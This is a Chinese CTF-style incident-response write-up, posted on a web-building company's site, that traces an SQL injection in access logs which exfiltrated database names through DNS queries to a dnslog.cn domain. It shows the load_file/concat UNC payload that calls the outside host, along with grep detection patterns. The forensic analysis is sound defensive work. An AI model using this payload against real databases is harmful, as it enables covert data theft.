尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

2026CCF-Sql注入的应急排查

2026CCF-Sql注入的应急排查 2026CCF-Sql注入的应急排查前言本次分析目标 通过分析 Web access 日志定位攻击者用于接收数据的 DNS 域名。1、初步查看日志格式2.发现SQL注入攻击行为3.找真正的攻击Payload4.分析攻击Payload5.Payload原理分析5.Linux提取攻击者域名前言某企业安全团队在日常安全运维过程中发现 WAF 设备产生大量 SQL 注入攻击告警。虽然 WAF 对大部分恶意请求进行了拦截但是安全人员进一步分析发现数据库服务器存在异常 DNS 查询行为Web访问日志中存在可疑 SQL 注入请求怀疑攻击者利用 SQL 注入漏洞绕过检测通过 DNS 隧道技术实现数据库敏感信息外传。本次分析目标通过分析 Web access 日志定位攻击者用于接收数据的 DNS 域名。1、初步查看日志格式head-10access.log确认是 Apache/Nginx access日志。2.发现SQL注入攻击行为搜索单引号闭合grepaccess.log|head该业务接口存在 SQL 注入探测行为。3.找真正的攻击Payload普通id1’ and ‘1’1只是扫描。为了寻找真实攻击需要搜索高危SQL函数。grep-Eiselect|union|sleep|load_file|concataccess.log出现关键的payload4.分析攻击Payload适用python脚本进行解密得到结果5.Payload原理分析database()(select database())作用获取当前数据库名称。concat()作用字符串拼接。攻击者执行concat(\\\\,(selectdatabase()),.p9fin2.dnslog.cn)假设数据库test最终生成\test.p9fin2.dnslog.cn3. load_file()核心load_file()MySQLload_file() 可以读取服务器文件。但是攻击者利用 Windows UNC 路径特性\域名\文件当数据库服务器访问\test.p9fin2.dnslog.cn\abc系统会首先进行 DNS 查询test.p9fin2.dnslog.cn5.Linux提取攻击者域名grep-idnslogaccess.log得到.p9fin2.dnslog.cn进一步提权grep-oE[a-zA-Z0-9.-]dnslog.cnaccess.log|sort-u最终得到flag是p9fin2.dnslog.cn
返回列表